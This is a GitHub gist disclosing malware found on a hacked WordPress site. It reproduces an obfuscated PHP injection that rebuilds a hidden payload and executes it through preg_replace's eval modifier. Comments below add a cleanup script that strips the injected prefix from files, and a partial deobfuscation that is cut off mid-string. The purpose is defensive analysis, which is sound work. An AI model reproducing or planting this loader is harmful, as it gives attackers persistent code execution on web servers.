Skip to content

Instantly share code, notes, and snippets.

@klein0r

klein0r/gist:3744c2ee9cdce01b034e

Created July 10, 2015 19:31
Show Gist options
  • Save klein0r/3744c2ee9cdce01b034e to your computer and use it in GitHub Desktop.
Save klein0r/3744c2ee9cdce01b034e to your computer and use it in GitHub Desktop.
Download ZIP
Another hacked Wordpress Instance
Raw
gistfile1.txt
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $tngmufxact = '%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x]88]5]48]32M3]317]445]212]445]43]321]464]284{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2bpreg_replace("%x2f%50%x2e%52%x29%57%x65","%x6%x7860439275ttfsqnpdov{h19275j{hnpd19275fubm%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5cc%x7825+*!*+fepdfe{h+{d%x5c%x7825c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5cvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2825r%x5c%x7878B%x5c%x782825tdz*Wsfuvso!%x5c%x7825bss%x5c%xssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+995c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x78b%x5c%x7825w:!>!%x5c%x7825)sf%x5c%x7878pmpusut)tpq256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x77f;!|!}{;)gj}l;33bq}k;opjudovg}%%x78257;utpI#7>%x5c%x7386c6f+9f5d816:+946:ce44#)zbs]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!h82f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7x7825cIjQeTQcOc%x5c%x782f#00y]#>>*4-1-bubE{h%x5c%x7j6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fub*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!mg%x5c%x7825)!gj!<2,*j%x#*<%x5c%x7825bG9}:}.}-}!#7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%c%x7825!>!2p%x5c%x7825!%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.7825Z<^2%x5c%x785c2b%x5%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%)#]341]88M4P8]37]278]225]24}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7867825w6<%x5c%x787fw6*CWtfs%x5c%x71#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osv825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::27u%x5c%x7825)7fmji%:8:|:7#6#)tutjyf%x5c787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%xL#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5cx5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!5)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y30fmjg}[;ldpt%x5c%x7825}K;%x5f]63]y3:]68]y76#<%x5c%x78e%x5c%xMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpu272qj%x5c%x7825)7gj6<**2qjx7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpuofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutj1]53]y6d]281]y43]78]y33]65]y31]55c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQP*3>?*2b%x5c%x7825)gpf%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsb825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x781]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x55c%x7825c*W%x5c%x7825eN+#Qi928>>%x5c%x7822:ftmbg39*56A:>25r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5q%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)f]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c,2W%x5c%x7825wN;#-Ez-1H*76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x782x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x78<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpzx5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-x5c%x787f%x5c%x787f%x5c%xpde:4:|:**#ppde#)tutjyx7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6PNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x786]y85]82]y76]62]y3:]84#-!OVMM*2]y3d]51]y35]274]y4:]82]ysb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FU%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#25z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7572]48y]#>m%x5c%x7825:|:*r%3:]62]y4c#<!%x5c%x7825t::!>!%x5o]s]#)fepmqyf%x5c%x7827*c%x7825zW%x5c%x7825h>EzH:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<hx5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]%162%x61%171%x5f%155%x61%160%x28%#]y76]277]y72]265]y39]274]y85]273]y6g]273]y>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#epdof%x5c%x786057ftbc%xc%x7825%x5c%x782fh%x5c%x7825ft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5cc%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]25x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x7824-%x5c%x7824-tusqpt)%x5c%56<*Y%x5c%x7825)fnbozcYufhA%4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x782!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x782x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gx5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x78!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mmx7825t2w>#]y74]273]y76]252]y%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%-111112)eobs%x5c%x7860un>qp%x5c%xeturn chr(ord($n)-1);} @error_reporting(0); x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufsgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5p%x5c%x7825mm)%x5c%x7825%%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x78%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c25!<***f%x5c%x7827,*e25j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!2985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]8<%x22%51%x29%51%x29%73", NULL);c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x7pd%x5c%x78256<pd%x5c%x7825w5!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x78256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277].fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x&7-n%x5c%x7825)utjm6<%x5c%x787fw6*tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]KfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x78 }s)%x5c%x7825j>1<%x5c%x7825j=6[7>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7885]256]y6g]257]y86]267]y74]275]y7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x78277825!|Z~!<##!>!2p%x5c%x78%62%x35%165%x3a%146%x21^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gp5%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c5h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x57825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#)ujojR%x5c%x7827id%x5c%x78x5c%x7878:-!%x5c%x7825tzw%x5c4%162%x5f%163%x70%154%x69%164%50%x22%134%x75c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x7842%x66%152%x66%147%x67%42%x2c%163%x7)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x782ufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~2]285]Ke]53Ld]53]Kc]55Ld]5587fw6*CW&)7gj6<.[A%x5c%x7827&6<%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%<.5%x5c%x7860hA%x5c%x7826Z6<.4%x5c%x7860hA%x5c%x7%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7]364]6]234]342]58]24]31#-%x5c%x7U,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*<~%x5c%x7824<!%x5c%x7825o:!>&& (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { %x782f},;#-#}+;%x5c%x7825-qpx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!c%x785c1^-%x5c%x7825r%x5c%x785c2^-%825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyfy72]265]y39]271]y83]256]y78]248]y83]256]%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%]y7d]252]y74]256#<!%x5c%x7825f!>!#]y81]273]y76]258]y6g]273]y76]271x7825z-#:#*%x5c%x7824-%x5cc%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f295c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x782x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c142%x5f%163%x74%141%x72%164") #jt0}Z;0]=]0#)2q%x5c%x7825l}S;2CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x782525)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJ5c%x7825%x5c%x787f!~!<##!>!2p%x5c%xx5c%x7825:-t%x5c%x7825)3of:opjudovg5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*dyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpj^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%oj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<-u%x5c%x7825!-#2#%x5c%x782f#%xx5c%x7825,3,j%x5c%x7825>j%x5cpd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x7824!>!tus%x5c%x7860sfqmbdf)%x86+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%f%x5c%x78604%x5c%x78223}!+!<+{e%x5#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7sut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x7824b!>!%x5c%x7825yy)#}#-#2f7#@#7%x5c%x782f7^#iubq#%x5c5%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x720QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787o)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%f2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x782zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%$GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){r5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%xj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcx7825V<*#fopoV;hojepdoF.u860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c8297f:5297e:56-%x5c%x7878r.985:5%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x55c%x7825-#1]#-bubE{h%x5c%x7825)%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x78257-K)udfoopdXA%x5c%x7822)7gif((function_exists("%x6f%/(.*)/epreg_replacesgeocmclkg'; $wzrfkwxlic = explode(chr((297-253)),'10080,26,8123,30,7364,50,9534,56,5242,44,136,45,9176,57,4378,33,6894,36,6743,43,6303,24,2782,44,2424,32,834,21,3834,34,7156,24,5700,28,7180,25,6221,58,8758,60,7795,59,4228,24,5858,34,8184,34,6147,41,2071,20,8053,70,983,22,1123,40,9831,35,5438,49,10048,32,1214,64,5954,55,2502,26,4839,50,4745,28,5002,62,9147,29,9466,68,3451,66,7205,51,9791,40,8383,63,8662,37,5821,37,2111,50,1759,32,2886,42,8218,57,7288,48,6688,26,886,65,7061,31,1342,59,1719,40,2396,28,2697,64,2456,46,4555,49,7639,64,4944,58,9647,57,5286,47,4889,55,5728,45,1087,36,1401,24,9951,31,8604,58,8729,29,472,67,385,36,9704,62,421,51,1191,23,7529,70,0,41,8275,35,1603,23,1515,23,2761,21,85,51,1626,66,4674,37,5394,44,5487,21,1538,65,2014,57,5209,33,6279,24,2574,39,9072,48,7442,52,9898,53,855,31,723,62,1005,29,3981,69,3868,59,9233,53,2264,36,2826,60,3150,61,4504,23,785,49,6635,53,6426,37,7414,28,1890,61,6984,50,3065,29,2091,20,181,44,5333,37,3757,22,8973,34,352,33,6930,54,2300,50,3732,25,6463,70,7854,41,602,63,1450,65,9766,25,2613,51,8446,56,6844,50,951,32,3687,45,8153,31,8699,30,8345,38,9410,56,4411,43,3541,58,6009,36,3211,66,5119,28,6188,33,4276,44,9982,66,3326,65,4527,28,3391,60,288,64,7092,64,4320,58,4170,27,8310,35,7336,28,5064,55,7733,36,7703,30,9354,56,6359,67,8548,56,9120,27,4711,34,7769,26,8878,32,9590,57,8011,42,1842,48,225,63,3779,55,8502,46,9286,68,2528,46,3956,25,4197,31,5651,49,3038,27,5147,62,1163,28,6045,70,3094,56,4252,24,3517,24,2998,40,7494,35,2210,54,9007,65,665,24,6533,61,9866,32,5567,53,1791,51,4773,66,4454,50,1034,53,5892,62,7034,27,1425,25,1278,64,6786,58,3650,37,1692,27,2928,70,41,44,7256,32,689,34,7954,57,8910,63,3599,51,5508,59,7895,59,1951,63,539,63,6327,32,6117,30,3277,49,4104,66,8818,60,5370,24,6714,29,4050,54,2161,49,6594,41,4604,70,5773,48,7599,40,2350,46,2664,33,3927,29,5620,31,6115,2'); $wutuvgawyv=substr($tngmufxact,(60303-50197),(32-25)); if (!function_exists('tttchsrlcp')) { function tttchsrlcp($smnunczuff, $tmwlxkzbmf) { $whghqcixdu = NULL; for($bpwxymtmgi=0;$bpwxymtmgi<(sizeof($smnunczuff)/2);$bpwxymtmgi++) { $whghqcixdu .= substr($tmwlxkzbmf, $smnunczuff[($bpwxymtmgi*2)],$smnunczuff[($bpwxymtmgi*2)+1]); } return $whghqcixdu; };} $lxsxadpskj="\x20\57\x2a\40\x6f\146\x6b\146\x78\163\x6f\163\x66\142\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\67\x35\55\x31\63\x38\51\x29\54\x20\143\x68\162\x28\50\x35\67\x33\55\x34\70\x31\51\x29\54\x20\164\x74\164\x63\150\x73\162\x6c\143\x70\50\x24\167\x7a\162\x66\153\x77\170\x6c\151\x63\54\x24\164\x6e\147\x6d\165\x66\170\x61\143\x74\51\x29\51\x3b\40\x2f\52\x20\142\x63\165\x75\164\x6a\161\x72\154\x69\40\x2a\57\x20"; $nfumbfnqsz=substr($tngmufxact,(66706-56593),(73-61)); $nfumbfnqsz($wutuvgawyv, $lxsxadpskj, NULL); $nfumbfnqsz=$lxsxadpskj; $nfumbfnqsz=(767-646); $tngmufxact=$nfumbfnqsz-1; ?>
@klein0r
Copy link
Author

klein0r commented Jul 10, 2015

Repair-Script:

<?php

$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);

foreach ($iterator as $filename => $cur)
{
    $contents = file_get_contents($filename);
    if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
        echo $filename.PHP_EOL;

        file_put_contents($filename, substr($contents, 13280));
    }
}

@klein0r
Copy link
Author

klein0r commented Jul 10, 2015

Deobfuscated #1:

<?php

if(!isset($GLOBALS["anuna"])) {
    $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
    if ((!strstr($ua, "msie")) && (!strstr($ua, "rv:11"))) {
        $GLOBALS["anuna"] = 1;
    }
}

$tngmufxact = '%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x]88]5]48]32M3]317]445]212]445]43]321]464]284{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2bpreg_replace("%x2f%50%x2e%52%x29%57%x65","%x6%x7860439275ttfsqnpdov{h19275j{hnpd19275fubm%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5cc%x7825+*!*+fepdfe{h+{d%x5c%x7825c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5cvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,2825r%x5c%x7878B%x5c%x782825tdz*Wsfuvso!%x5c%x7825bss%x5c%xssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+995c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x78b%x5c%x7825w:!>!%x5c%x7825)sf%x5c%x7878pmpusut)tpq256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x77f;!|!}{;)gj}l;33bq}k;opjudovg}%%x78257;utpI#7>%x5c%x7386c6f+9f5d816:+946:ce44#)zbs]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!h82f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7x7825cIjQeTQcOc%x5c%x782f#00y]#>>*4-1-bubE{h%x5c%x7j6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fub*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!mg%x5c%x7825)!gj!<2,*j%x#*<%x5c%x7825bG9}:}.}-}!#7R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%c%x7825!>!2p%x5c%x7825!%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.7825Z<^2%x5c%x785c2b%x5%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%)#]341]88M4P8]37]278]225]24}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7867825w6<%x5c%x787fw6*CWtfs%x5c%x71#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osv825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::27u%x5c%x7825)7fmji%:8:|:7#6#)tutjyf%x5c787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%xL#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5cx5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!5)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y30fmjg}[;ldpt%x5c%x7825}K;%x5f]63]y3:]68]y76#<%x5c%x78e%x5c%xMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpu272qj%x5c%x7825)7gj6<**2qjx7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpuofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutj1]53]y6d]281]y43]78]y33]65]y31]55c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQP*3>?*2b%x5c%x7825)gpf%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsb825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x781]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x55c%x7825c*W%x5c%x7825eN+#Qi928>>%x5c%x7822:ftmbg39*56A:>25r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5q%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)f]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x78%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c,2W%x5c%x7825wN;#-Ez-1H*76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x782x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x78<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpzx5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-x5c%x787f%x5c%x787f%x5c%xpde:4:|:**#ppde#)tutjyx7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6PNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x786]y85]82]y76]62]y3:]84#-!OVMM*2]y3d]51]y35]274]y4:]82]ysb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FU%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#25z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7572]48y]#>m%x5c%x7825:|:*r%3:]62]y4c#<!%x5c%x7825t::!>!%x5o]s]#)fepmqyf%x5c%x7827*c%x7825zW%x5c%x7825h>EzH:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<hx5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]%162%x61%171%x5f%155%x61%160%x28%#]y76]277]y72]265]y39]274]y85]273]y6g]273]y>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#epdof%x5c%x786057ftbc%xc%x7825%x5c%x782fh%x5c%x7825ft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5cc%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]25x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x7824-%x5c%x7824-tusqpt)%x5c%56<*Y%x5c%x7825)fnbozcYufhA%4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x782!~<3,j%x